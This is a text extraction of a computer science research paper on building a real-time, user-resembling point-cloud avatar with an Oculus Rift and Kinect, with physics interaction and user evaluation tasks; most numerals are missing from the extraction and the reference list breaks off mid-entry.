hardware integration from different manufacturers is a key point in vr applications and may increase software development complexity. the oculus rift dk was chosen for visualization and the kinect for windows v was chosen for motion tracking, color and depth sensing. this choice considered that both macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. this is the highest openmp version available for visual c++ in visual studio . table compatibility requirements for development environment and software usage. system rel- evant information: windows pro; amd radeon hd series; intel(r) core(tm) i - cpu @ . ghz; gb ram. identification compatibility requirement description c the kinect for windows v requires windows or higher. c the kinect for windows v requires kinect for windows sdk . . c the oculus rift dk on windows requires oculus runtime and sdk . or higher. c the oculus runtime . running alongside an amd radeon hd re- quires amd catalyst . . beta driver* notes. *later versions of the new crimson driver were found to be incompatible with oculus runtime . . devices were the latest iteration available at their respective product lines by the time this study was developed and, thus, had significant improvements over previous iterations. specifically, the oculus rift dk has a higher screen resolution and better head movement tracking than the dk , which contributes to an improved and seamless visual interaction with the virtual environment. this choice of hardware requires a specific setup of the development environment and later usage of the software because there are potential compatibility issues with operational system, hardware runtime routines, graphic card drivers and available sdks for each device. a list of requirements for compatibility is available in table along with relevant information from the system. when multiple versions of software were possible, we opted for the most recent. the language of development is c++ for it was the only language officially supported by both oculus rift and kinect sdks. both sdks can be obtained through their respective product websites, along with correct versions of drivers and runtimes (shown in table ) which are necessary for hardware functioning. in addition to sdks, drivers and runtimes, we used a few libraries: the opengl library is already integrated to the oculus sdk and sample programs; the bullet engine . . is responsible for physics simulation in the virtual environment, specially collisions between the avatar and virtual objects; and the openmp . is used for parallelization in the handle classes for each sdk. the code was implemented and compiled with visual studio . software requirements the requirements listed in table guided software development. other functions (only feasible for the chosen hardware) were implemented along the development in order to provide more interaction options to the user and will be described later. regarding requirement r . , the decision to create the avatar based on real time data is crucial to the final objective of the software, which is to create a deeper sense of immersion in the user. this requirement should enforce the avatar to morph and move accordingly to each user in real time and provide plausible responses to each of their actions in the virtual environment. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. the camera space is a three-dimensional space that represents the position of each point in the real world ‘‘space’’. table basic requirements for the development of the software. identification requirement description r the software shall create a d recreation of the user—known as the avatar. r . the avatar shall be defined by real time data from the depth and color sensors. r . the avatar shall be displayed in a d virtual environment in a hmd. r the software shall offer the option to visualize in first-person perspective or third-person perspective. r the software shall render at an acceptable frame rate (minimum fps). r the software shall provide simulated physical interaction between the avatar and the environment. r the software shall provide a keyboard interface to select which user has the oculus rift point of view, when first-person perspective is selected. r the software shall provide a keyboard interface to adjust the camera position in order to accommodate and match the user virtual visualization with the real world. implementation of core functionality the development of the main idea of the software, described by requirement r . in table , involves the concept of a point cloud (linsen, ; rusu & cousins, ). this element is composed by a group of points fully defined by their location in a d space with magnitude on each of the three space dimensions. such property allows the programmer to plot this point cloud in a d virtual environment and visualize the surface from which the point cloud was acquired in the first place. when visualizing the point cloud, it is possible to perceive the dots as a ‘‘cloud’’ floating in the virtual space, hence the name. if not computationally generated, one can acquire a point cloud from the real world with a depth sensor, laser scanner data or photogrammetric image measurements (remondino, ). for this purpose, this paper uses the kinect v , which provides features beyond depth sensing that will be discussed later. the rationale is that it is possible to create a polygon surface from the point cloud of one user. therefore, the first step was to acquire the point cloud and plot it in the virtual environment, with the aid of the opengl library. using the kinect sdk, we developed a handle class to request data from the kinect and translate it to an opengl compatible format. the kinect v can simultaneously detect and differentiate up to six users, also called bodies. in addition, the kinect provides five types of pertinent data for this project: . color frame: a rgb frame with , × , p. . depth frame: a depth frame with × p. . body frame: a × frame where each element contains the index of the detected body for the relative pixel in the depth frame. . joint vertices: a float array containing information for the camera space localization of each joint of each body. . body array: indicates which of the six possible bodies the kinect is currently tracking the acquisition of each type of data is executed by a function inside the kinect handler class and parallelized with the openmp library for optimization. figure shows the function getcolordepthandbody() called from the handle class, which returns the frame macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. main.cpp frame rendering roomscene->render(...); win _glapputil.cpp struct scene dotstest->updatepoints(); dotstest->display(...); update avatar points from kinect struct mydots kinect->getcolordepthandbody(...); get data from kinect handler kinect->m_pcoordinatemapper-> mapdepthpointtocolorspace(...); kinect->m_pcoordinatemapper-> mapdepthpointtocameraspace(...); convert data to virtual space glbufferdata(...); upload do opengl bufferdraw avatar graphics and update collision objects rigidbodyarray[...]-> getmotionstate()->getworldtransform(...); rigidbodyarray[...]-> getmotionstate()->setworldtransform(...); update joints' positions gldrawarrays(...); draw to opengl frame boxmodels[i]->boxrigidbody-> getmotionstate()->getworldtransform(...); update positions and draw graphics from other models boxmodels[i]->render(...); (...) figure frame rendering cycle: structures and functions. figure dataflow and processing. data from the kinect. in fig. , it it possible to observe this same process with a higher level of abstraction, where the handle class acquires the kinect frame data and returns it to the next structure for processing. next, the depth information from the depth frame is mapped to camera space in order to create the aforementioned point cloud, as shown in fig. . this means that each pixel in the depth frame is mapped to a d virtual representation of the real world, so that the software is able to plot a visualization for the point cloud. alongside, it is also needed to map the depth frame to the color information from the color frame so that the software is able to associate rgb color to each point in the depth frame and render an improved visualization in the oculus rift. the kinect sdk provides both mapping functions and they are used accordingly in the software. the function to map depth frame to camera macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. space is declared as mapdepthpointtocameraspace in the icoordinatemapper struct. it receives a depth space point and a depth value and returns by reference the camera space point. the function to map the depth frame points to color frame points is declared as mapdepthpointtocolorspace. similarly, it receives a depth space point and a depth value and returns by reference a color space point. with those two conversions, the software is able to place each point in a d space and associate rgb color to each point, creating the point cloud. those function are presented in the frame rendering cycle, in fig. the next processing stage in fig. updates the point cloud data to their respective opengl buffers and to the bullet engine objects in order to create the point cloud graphic visualization and simulate interactions between the point cloud and the virtual environment. figure shows the order in which those structures and functions are activated in order to render a frame. this simulation is further discussed below. the whole virtual environment is graphically displayed as a rectangular room. in this room, there is a green block and a colored ball within the user’s field of action, i.e., objects with which the user’s avatar can interact. however, this interaction can only happen through a physical contact which is simulated by the bullet engine. for this to happen, each object, such as the green block, the colored ball and even the walls of the room have to be represented as geometrical shapes inside the bullet engine, otherwise those elements would stay still or move in the room without ever noticing any contact with other objects, percolating through each other as if they did not exist. the bullet engine, as any other physics engine, has to predict the final rectangular and angular position of an object, given its initial position and velocity and using the geometrical representation of each object. this is how the physics simulation occurs and without it there could be no interaction whatsoever between the avatar and the virtual space and objects. assuming that user contact interactions happen mostly near joints like wrist, ankles, knees or elbows for example, it is sensible to consider that approximately any useful contact interaction happens through joints. the kinect v provides joints for tracking and all of them are used in the software implementation. in the bullet engine, each avatar joint (dealt with as if it were a point in camera space) becomes a small sphere, specifically a kinematic rigid body type (coumans, ), capable of colliding with other objects, but not having its position altered by them. this representation is what allows the user to interact with other objects in the virtual room. each joint has a position that is dictated solely by the user and, when each frame is being rendered, this joint position is given to their respective kinematic spheres. this implementation allows for real time tracking and modification of each joint’s position in the physics simulation and leaves the task of calculating velocity, acceleration, momentum and other variables of the objects to the physics engine. after every joint position is updated, the software advances one step with the simulation. if any object such as the green block or the sphere is moving or collides with other objects or with an avatar joint, the physics engine updates their position, rotation and other variables accordingly. this information is also sent to their respective opengl buffers, and now opengl is ready to render a new frame. the final step is to get the motion data from the oculus rift as shown in fig. . this action is needed to properly link the head motion with the opengl, so that there is a macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. correspondence for the hmd position and angles with what can be seen in the opengl virtual environment. in the end, the software sends the frame to the oculus rift. figure shows the roomscene struct calling the render() function in order to finish the rendering cycle and display the final image in the oculus rift. this method is novel in the way it uses several kinect and oculus rift features integrated with graphical elements and physics simulations. as pointed out in the introduction, there are few publications that tackle this integrated approach between hmds and motion tracking devices (woodard & sukittanon, ; baldominos, saez & del pozo, ; stavroulia et al., ), yet none of them developed a live avatar, with skeleton tracking and environment interactivity such as touching and pushing. functionality and performance assessment we conducted a comprehensive set of experiments to evaluate the functionality and performance of the method. first, we analyze the core aspects of avatar visualization with point cloud and polygon surface. the focus is on user experience and visualization perspectives. rendering performance issues and limitations are assessed with the fraps tool (beepa pty ltd., albert park, victoria, canada), which provides the frame rate measurement. we also investigate the interactivity experience with respect to physical collisions of virtual objects with the avatar. we then proceed with three tasks that are able to further evidence the properties of the system. for that, participants were recruited: one who is experienced in interacting with virtual reality environments, and the other who is naive to usage of this technology. both participants signed the informed consent forms (the brazilian national committee of ethics in research—conep- ethics committee protocol number: irb . . ). in the first task, we evaluate whether the user avatar is capable of tracking the trajectory of a virtual object performing a -dimensional sinusoidal motion. participants are seated in a comfortable chair and asked to wear the oculus rift hmd. after a fine adjustment of head and body position, the participant sees their arms (point cloud) and a small red virtual block. the block starts a -dimensional sinusoidal trajectory ( . rad/frame update), and the participant has to use their hand to follow the same trajectory as that from the block. performance is evaluated by the coefficient of determination (r ) between the user and the block trajectory. in the second task, we evaluate whether the system provides a realistic interaction experience, i.e., if the actions performed by the participant are correctly captured by the kinect sensor and displayed as a point cloud avatar that is able to interact with virtual d objects. to accomplish that, participants are asked to jiggle a green block from left to right for as long as they can, making sure that it does not fall. performance is assessed by the number of successful jiggles. in the third and last task, we investigate if our oculus plus kinect method performance is similar to that from other systems in terms of trajectory tracking and mismatches between the virtual and real world integration. in this task, the participant is positioned in front of a table, located between six pillars (fig. a). the kinect is placed at≈ . m in front of the table, and six precision motion capture infrared cameras (optitrack s e, naturalpoint macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure third task setup: (a) block reaching task. in each trial, the participant places their right hand to the side of the rightmost line and then moves until reaching the black block. six precision motion capture cameras are attached one to each pillar. the user wears the oculus rift hmd and the kinect is positioned in front of the table. three task stages (b) as captured by the oculus plus kinect (c) and op- titrack (d) systems. inc.) are attached to the pillars (one to each pillar). on the table, we mark two lines ( cm apart) and place a black block right to the side of the leftmost line. then, one participant is asked to position their hand next to the rightmost line and move toward reaching the black block (fig. b). the procedure is repeated for s. using reflective markers and the ir cameras, we are able to accurately measure the participant’s hand and the block spatial coordinates, as well as detect when the hand crosses either of the lines. during the task, the participant is wearing the oculus rift and sees a corresponding virtual scenario (table and block), together with a point-cloud visualization of the right hand. in this way, we can compare the hand trajectory captured by the oculus plus kinect system with that captured by the optitrack system. also, we can determine if there are any mismatches between the physical and real world by looking at the spatial coordinates over time of each task element. results a method for creating a user-resembling avatar the software implementation of the described method results in a demonstration capable of creating and rendering a real-time avatar representation of the user. the implementation is written based on the samples provided by the oculus rift sdk, keeping the code elements that deal with the oculus rift communication and adding the code elements that communicate with the kinect handler class, generate the avatar for the opengl library and execute the physics simulation for the bullet engine. using the pointcloud approach allows the software to implement two types of avatar: a pointcloud-based avatar and a polygon-based avatar. the first type is shown in fig. . the software creates a pointcloud using the camera space points that the kinect provides. each camera space point becomes a point inside the opengl virtual environment with macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure avatar visualization with point cloud. this figure represents both left and right frames pro- jected through the oculus rift lenses. the point-cloud avatar is seen in third-person perspective with a striped look, which is a consequence of the alignment of the point cloud and the position in which the frame was captured in d space. the red dots in the body indicate joint points provided by the kinect and that are used for collisions. properties of three-dimensional space and rgb color. the other type of avatar uses the camera points to create polygons where each vertex is a point in the three-dimensional space as show in fig. . as a result, this implementation produces a sense of continuity in the avatar’s body representation, only at the expense of knurled edges. in addition, the software allows the user to see the virtual environment in first-person perspective. this feature is specially important for the immersion factor in our integrated hardware-software approach. the correct head location is obtained with the head position tracking provided by the kinect sdk while the head rotation and angle is handled by the oculus sdk. this coordination of features provides a solid recreation of the user’s field of view while they walk around the physical environment. the only limitation is the kinect field of view and the length of the oculus rift cable. in addition, the software allows for a fine adjustment on the head position with the arrow keys or the ‘‘a’’, ‘‘w’’, ‘‘d’’, ‘‘s’’ keys in the keyboard. the kinect also provides support for the recognition of up to six users and the software implements this feature. every person in front of the kinect sensor is recognized as an user (up to six) and the software offers the option of which user is on first-person mode. this choice is made with the number keys in the keyboard starting from up to . the ‘‘ ’’ key serves as a reset mode, detaching the field of view from the last chosen user. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure avatar visualization with polygon surface. similarly to fig. we see both left and right frames projected through the oculus rift’s lenses. in this case, the avatar has a continuous surface, except for its borders and generated artifacts on the base. the red dots that represent kinect joints can still be noticed behind the avatar and its right index finger. physical collisions with the avatar one of the keystones for an immersive virtual reality experience is interactivity. in this approach, we used the bullet physics engine in order to recreate a desired physical interaction simulation between the avatar and an arbitrary virtual object. a green solid rectangular block was created in the virtual environment and placed within the reach of the user’s avatar. figure represents the moment when the user tries to balance the green block with their own hands, preventing it from falling. in the code, the programmer can add more objects to the simulation using the bullet physics engine. in our approach, each joint vertex provided by the kinect becomes a bullet static object. it is possible to visualize a general distribution of joints along the body in fig. , where each red dot is a joint. therefore, each red dot can collide with virtual elements, considering the fact that the dot itself does not suffer any consequence from the collision because its location depends only on the data from the kinect. in fig. , the red dots are the contact points between the avatar’s hands and the green block and are responsible for pushing and moving the object at any condition. avatar interaction with the vr world avatar interaction with the vr world was assessed with three tasks. in the first task, the block tracking task, both naive and experienced users succeeded in following the sinusoidal block motion (figs. a and c). note the high resemblance between block and user trajectories in the x direction (r = . ), whilst the y and z directions present a more divergent motion. we proceeded by investigating the user ability in handling a virtual object. figures b and d show the results for the block jiggling task. both naive and experienced users were macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure physics interaction with green block. this figure shows the first-person perspective while the avatar interacts with a green block. the avatar is reaching for the green block in order to interact with it. although the hands are graphically displayed, only the red dots can contact the green block. able to manipulate the object, but the latter was significantly better ( % confidence, as indicated by the non-overlapping boxplot notches) at preventing the block from falling. lastly, in the third task (figs. and ), we investigated the tracking performance and analyzed possible mismatches between the real and vr worlds by comparing the oculus plus kinect system with a precision motion capture device (optitrack). as the participant moves their hand from one side of the table toward the black block, both systems successfully capture the trajectory, as displayed in fig. a. note that the optitrack trajectories are smoother than the oculus plus kinect trajectories, which is expected given the optitrack tracking method (infrared) and superior frame rate ( frames/s). the moment both systems detect that the participant has reached the block has a difference of ≈ ms (fig. a, inset panel). regarding the oculus plus kinect system frame rate over the course of the task, we observe from fig. b that it has an average value of≈ frames/s; the minimum value was frames/s. note that the kinect has a frame rate of frames/s, thus there may be a mismatch between the kinect and the oculus data. nevertheless, the results from the three tasks above indicate that this does not compromise the user experience. taken together, our results indicate that the method suggested in this paper provides a real time immersive experience interaction. discussion an approach for creating a real-time responsive and user-resembling avatar this work presents a structured method for integrating both hardware and software elements in order to conceive an avatar visualization that is responsive to user movements macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure avatar interaction with virtual world. (a) block tracking task. with their hand, the user has to follow a red block as it performs a d sinusoidal trajectory (left to right panels). (b) block jiggling task. using both hands, the user has to jiggle a parallelepiped-shaped green block from left to right whilst en- suring that it does not fall. (c) representative , iterations of block and user trajectories for x–y –z coordinates. note that the block sinusoidal trajectory occurs only in the x coordinate. (d) distribution of successful trials (number of successive left to right block jiggles with no falls in n= attempts) for a naive and experienced user. and can interact with virtual objects. the implementation includes features such as first and third person perspective, the choice of which user is the main point of view, and also the possibility to adjust the point of view, as in farther or closer to the central head position, for example. the method was developed in order to increase the immersion experience in vr systems, focusing on avatar resemblance with the user and the interaction with the virtual environment. considering the three levels of self representation presented by de frança & soares ( ), the system exploit mostly the body and identity levels. on one hand, the creation of the avatar assumes a body position and shape that is intrinsically connected with the macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure comparison between the oculus plus kinect and optitrack systems. (a) five representa- tive trials of hand trajectories (represented as hand distance from block over time) for each system. each trial has a duration of . – s. blue and red color scale (lighter to darker) relate to respective trial number. the inset panel shows the time difference ( t) between both systems in detecting that the block has been reached. (b) oculus plus kinect system frame rate over the duration of the task ( s). user to create a self representation. on the other hand, the identity level is supported by a feature that recreates the avatar from real time user data, allowing them to see their own shapes and clothes in real time. also, the possibility to interact with objects allows the user to sense the limits between their virtual selves and the virtual environment, creating avatar identity. the last level of self-representation, affection, is not directly addressed by the system, as we do not shape or modify the avatar to increase affection. yet it emerges from the affection the user has for their own virtual representation, since it resembles closely their real body shape. therefore, the system presents a good combination of all the three levels, which impacts on immersion and sense of embodiment. exploring three different tasks, we were able to assess the system performance with respect to the immersion and interactivity requirements. in the first task (fig. ), the block tracking task, both naive and experienced users were able to follow the sinusoidal path performed by the block. this indicates that the avatar is easily incorporated by the user and its interaction with elements from the vr world are coherently coupled with actions in the real world. this fact is reinforced by the second task, in which users manipulate a virtual object. the oculus plus kinect system is capable of creating an avatar that is responsive to users actions whilst the collision detection module provides a realistic sense of interaction with the real world. the statistically significantly difference in performance between naive and experienced vr users in a relatively easy manual coordination task stresses that the interaction with virtual objects can improve with practice. also, incorporating a haptic feedback system may improve user experience in the virtual world (lecuyer et al., ; otaduy, okamura & subramanian, ). finally, in the third task (fig. ), results indicate that the mismatch between the virtual world and real world actions is kept to a minimum and does not compromise the user immersion experience. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. limitations and further improvements point cloud visualization and program parallelization the core concept in this implementation involves the visualization of a point cloud. this visualization can be either as points floating in the virtual space for each data point in the point cloud or a surface recreation from the point cloud data. as a result, the quality of the avatar graphical visualization is inherently dependent on the point cloud data quality. the point cloud data provided by the kinect is noisy, as seen in fig. . the implementation for the avatar visualization, in this work, sends all kinect point data to the opengl library, without performing any analysis or filtering. the result is an avatar visualization that is easily recognizable as the current user, but presents noisy and undefined borders. a first improvement over this method would be to implement a data filter to exclude points from the visualization that goes beyond a predefined body contour. a first method shown in point cloud library ( ) involves trimming points that are located further than a specified threshold, the interval between the mean and the standard deviation of the global distance, according to a gaussian distribution of the distance. other methods (schall, belyaev & seidel, ) involve heavy calculations and, although they might produce a better result, the filtered point cloud may not significantly improve visualization. the point cloud itself imposes another problem that affects the speed of the system. during the rendering cycle, after the data is acquired from the kinect, the system has to convert all the data points from the depth space to the camera space (i.e., the real world d dimensions), this processing is made in the cpu because it uses kinect specific functions and this limits the processing throughput according to the number of cores the cpu has. in addition, there are several methods to create a surface from the point cloud. the method used to create fig. consists of connecting the camera space points in groups of three, considering the d matrix from which they were acquired, and rendering a triangle with opengl. however, using the polygon rendering mode with openmp may cause the program to suffer a severe drop on rendered frames per second, thus further work should explore this issue. when creating a smooth surface from the point cloud, it is important to observe how the method will affect frames throughput on opengl engine. an optimal implementation would seek to parallelize this process within the graphics processing unit (gpu). the implementation of a point cloud triangulation algorithm such as presented in scheidegger, fleishman & silva ( ) would have to be tested for real time applications. integration with eye and gaze tracking technologies one of the key factors for immersion, as mentioned by alshaer, regenbrecht & o’hare ( ), is the field of view (fov). in general, fov or visual field is the area of space within which an individual can detect the presence of visual stimulus (dagnelie, ). for vr, one might assume that matching the fov of vr headsets with that of our own eyes would be ideal, but that is not necessarily the case. a widening of the field of view is beneficial to the immersion factor as stated by prothero & hoffman ( ) and alshaer, regenbrecht & o’hare ( ). nowadays, most vr headsets have a field of view of about vertical degrees (digitaltrends, ), whereas the field of macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. view of the human eye with binocular view is about vertical degrees. however, there are other factors such depth-of-field (dof) blur that affect the perception of field of view. hillaire et al. ( ) mention that technologies such as eye and gaze tracking can be used to improve the depth-of-field blur, considering that dof simulates the fact that humans perceive sharp objects only within some range of distance around the focal distance, and thus humans do not use the whole fov at the same time. hillaire et al. ( ) concluded that eye and gaze tracking technologies could be used to exploit visual effects that depend on the user’s focal point, aiming to increase usage comfort and immersion within vr systems. nowadays, there are a few options that implement eye tracking capabilities in hmds. the first one is tobii eye tracking, which tries to perform custom adaptations to link an existing eye tracking device to a hmd. the second and most promising option would be the fove vr headset, which implements the integration of hmd and eye tracking in the system as a whole. however, fove is currently open for pre-orders only and software development for this device is still in its initial steps. alternative approach for an improved physical simulation in its current version, each detected skeleton joint from the kinect becomes a small sphere for physical simulation within the bullet engine. as a result, only a few predetermined points are able to interact with the virtual objects in the simulated environment. this implementation renders a realistic physical simulation when the user pushes a virtual object, but performance deteriorates when the user tries to hold objects, specially the small ones. this happens because the kinect provides only three skeleton joints for the hand, which is not enough for a realistic approximation for hand interaction in some situations. this limitation is extended for the whole body for different interactions, when the number of points does not allow for a realistic approximation for body interactions. an improvement over this implementation would be to use a greater number of points for approximating body interactions. in this approach, a much greater number of points from the point cloud would become spherical rigid bodies in the bullet engine instead of limited skeleton joints. in this way, there would be a better sense of interaction with the body surface because the gap between contact points would decrease and improve the perception of continuity. using a greater number of points is a reasonable alternative given that the bullet engine does not officially allow for kinematic surfaces in its current implementation, which discourages developing physical interactions with an actual surface obtained from the point cloud. however, as the number of rigid bodies in the simulation increases the bullet simulation slows down, which would affect the number of frames the application could provide for the oculus rift. a possible solution for this problem is in experimental stage and will be available in future versions of the bullet engine. the bullet engine developers are using opencl to parallelize simulation in the gpu and, as a result, the engine can handle real time simulation of thousands of objects simultaneously (harada, ). this alternative solution for physical interaction could improve the level of realism the software provides, specially the finesse with which each touch is calculated. the user would be able to handle objects with their fingers, for example, depending on how many points macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. from the point cloud are used, and whole-body interactions would be better illustrated for the body surface, instead of the body joint approximation. interfacing with other platforms in the last few years, virtual reality has become much more accessible. the oculus rift and the kinect were surely promoters of this revolution by taking really expensive hardware used for scientific research and reshaping it to the consumer price level. yet this revolution continues within the realm of mobile platforms, spreading even more the virtual reality concept to the masses. the google cardboard is a good example. for a reduced price, one can buy or build a head mounted display that uses their own smartphone as a display for a virtual reality environment. in order to use the present system in a mobile setting, we have to consider how the system is organized and how the interface with each device works. if it were to substitute the oculus rift for a smartphone-based hdm, there is still the need to use the kinect to create the avatar representation. however, building an interface to connect the kinect directly with a mobile platform is challenging. a possible solution to this problem is to implement a webservice whose main task would be to pipe pre-processed kinect frame data to the smartphone. in this architecture, the bulk of processing, which is converting depth points to d space, would be done in the desktop computer and a portable graphics rendering solution such as opengl es would be able to use this data to create the virtual environment similarly to what happens in the oculus rift. a similar project was developed by peek ( ), in which he can send depth and skeleton data to a windows phone. conclusion vr systems are constantly improving, yet they still lack a few features that could enhance user experience. the immersion factor is crucial for user engagement, allowing for life-like psychological and physical user responses and scientific experiments. there are still a few elements that influence the immersion experience. the avatar is one of them and, aligned with wrzesien et al. ( ), who showed that appearance resemblance with the user creates a stronger set of emotional responses, avatars that recreate user features will probably provide an improved virtual reality immersion. this work aimed to create a user avatar with currently available commercial technology. we used kinect and oculus rift for this purpose. the former is responsible for acquiring color, depth and movement data from the environment, which allows the latter to visually recreate an avatar representation of the user. together with a physics engine, we provide avatar interactions with objects in the virtual environment. the method presented in this work lies within the realm of vr applications, specially those which require avatar representation and physical interactions with the virtual environment. the hardware and software approach we used is expandable to other systems. it is innovative in the way it binds the hardware and software capabilities by integrating the virtual environment with skeleton tracking, body detection, and object collisions in order to create a unique, user-resembling and interactive avatar. all of these features together appeal to the final user and contribute to an immersive interaction with virtual reality. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. acknowledgements we acknowledge the support from the staff and students from the edmond e lily safra international institute of neuroscience. additional information and declarations funding this work was supported by the brazilian financing agency for studies and projects (finep), the brazilian ministry of science, technology and innovation (mcti), the national institute of science and technology (inct) brain machine-interface (incemaq/mcti/cnpq/capes/fapern), and the ministry of education (mec). the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: brazilian financing agency for studies and projects (finep). brazilian ministry of science, technology and innovation (mcti). national institute of science and technology (inct). brain machine-interface (incemaq/mcti/cnpq/capes/fapern). ministry of education (mec). competing interests the authors declare there are no competing interests. author contributions • igor macedo silva conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper. • renan c. moioli conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): the brazilian national committee of ethics in research (comissão nacional de Ética em pesquisa - conep) granted ethical approval for the santos dumont institute to carry out the study within its facilities (ethical application ref: . . ). data availability the following information was supplied regarding data availability: github: https://github.com/igormacedo/liveinteractiveavatar. macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/igormacedo/liveinteractiveavatar http://dx.doi.org/ . /peerj-cs. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abulrub ag, attridge a, williams ma. . virtual reality in engineering education: the future of creative learning. international journal of emerging technologies in learning ( ): – doi . /ijet.v i . . alshaer a, regenbrecht h, o’hare d. . immersion factors affecting perception and behaviour in a virtual reality power wheelchair simulator. applied ergonomics : – doi . /j.apergo. . . . asus. . xtion pro live. available at https://www.asus.com/us/ d-sensor/xtion_ pro_live/specifications/ (accessed on june ). baldominos a, saez y, del pozo cg. . an approach to physical rehabilitation using state-of-the-art virtual reality and motion tracking technologies. procedia computer science (december): – doi . /j.procs. . . . clark ra, pua yh, fortin k, ritchie c, webster ke, denehy l, bryant al. . validity of the microsoft kinect for assessment of postural control. gait and posture ( ): – doi . /j.gaitpost. . . . clark ra, pua y-h, oliveira cc, bower kj, thilarajah s, mcgaw r, hasanki k, men- tiplay bf. . gait & posture reliability and concurrent validity of the microsoft xbox one kinect for assessment of standing balance and postural control. gait & posture ( ): – doi . /j.gaitpost. . . . coumans e. . bullet . physics sdk manual. available at http://bulletphysics.org. cuperus aa, laken m, van den hout ma, engelhard im. . degrading emotional memories induced by a virtual reality paradigm. journal of behavior therapy and experimental psychiatry : – doi . /j.jbtep. . . . dagnelie g (ed.) . visual prosthetics: physiology, bioengineering, rehabilitation. new york: springer. de frança acp, soares mm. . dialogical self on virtual reality systems: pres- ence and embodiment in human situated interaction. procedia manufacturing (ahfe): – doi . /j.promfg. . . . depthsense. . depthsense cameras. available at https://www.softkinetic.com/ products/depthsensecameras (accessed on june ). didehbani n, allen t, kandalaft m, krawczyk d, chapman s. . virtual reality social cognition training for children with high functioning autism. computers in human behavior : – doi . /j.chb. . . . digitaltrends. . spec comparison: does the rift’s touch update make it a true vive competitor? available at https://www.digitaltrends.com/virtual-reality/oculus-rift-vs- htc-vive/ (accessed on june ). donati arc, shokur s, morya e, campos d. sf, moioli rc, gitti cm, augusto pb, tripodi s, pires cg, pereira ga, brasil fl, gallo s, lin aa, takigami ak, macedo silva and moioli ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /ijet.v i . http://dx.doi.org/ . /j.apergo. . . https://www.asus.com/us/ d-sensor/xtion_pro_live/specifications/ https://www.asus.com/us/ d-sensor/xtion_pro_live/specifications/ http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /j.gaitpost. . . http://dx.doi.org/ . /j.gaitpost. . . http://bulletphysics.org http://dx.doi.org/ . /j.jbtep. . . http://dx.doi.org/ . /j.promfg. . . https://www.softkinetic.com/products/depthsensecameras https://www.softkinetic.com/products/depthsensecameras http://dx.doi.org/ . /j.chb. . . https://www.digitaltrends.com/virtual-reality/oculus-rift-vs-htc-vive/ https://www.digitaltrends.com/virtual-reality/oculus-rift-vs-htc-vive/ http://dx.doi.org/ . /peerj-cs. aratanha ma, joshi s, bleuler h, cheng g, rudolph a, nicolelis mal. . long-term training with a brain-machine interface-based gait protocol induces partial neurological recovery in paraplegic patients. scientific reports (april): doi . /srep . draganov ir, boumbarov ol. . investigating oculus rift virtual reality display applicability to medical assistive system for motor disabled patients. in: ieee th international conference on intelligent data acquisition and advanced computing systems: technology and applications (idaacs). vol. . piscataway: ieee, – doi . /idaacs. . . fox j, bailenson jn. . virtual self-modeling: the effects of vicarious reinforce- ment and identification on exercise behaviors. media psychology ( ): – doi . / . gonzalez-jorge h, riveiro b, vazquez-fernandez e, martínez-sánchez j, arias p. . metrological evaluation of microsoft kinect and asus xtion sensors. measurement ( ): – doi . /j.measurement. . . . harada t. . a parallel constraint solver for a rigid body simulation. in: siggraph asia sketches on–sa ’ . new york: acm press, . hillaire s, lecuyer a, cozot r, casiez g. . using an eye-tracking system to improve camera motions and depth-of-field blur effects in virtual envi- ronments. in: ieee virtual reality conference. piscataway: ieee, – doi . /vr. . . leapmotion. . leap motion api overview. available at https://developer.leapmotion. com/documentation/csharp/devguide/leap_overview.html (accessed on june ). lecuyer a, vidal m, joly o, megard c, berthoz a. . can haptic feedback improve the perception of self-motion in virtual reality? in: proceedings of the th interna- tional symposium on haptic interfaces for virtual environment and teleoperator systems, (haptics’ ). – doi . /haptic. . . linsen l. . point cloud representation. technical report – . fakultät f’’ur informatik, universität karlsruhe (th). lugrin jl, landeck m, latoschik me. . avatar embodiment realism and virtual fitness training. in: proceedings of the ieee virtual reality conference. piscataway: ieee, – doi . /vr. . . luigi m, massimiliano m, aniello p, gennaro r, virginia pr. . on the validity of immersive virtual reality as tool for multisensory evaluation of urban spaces. energy procedia : – doi . 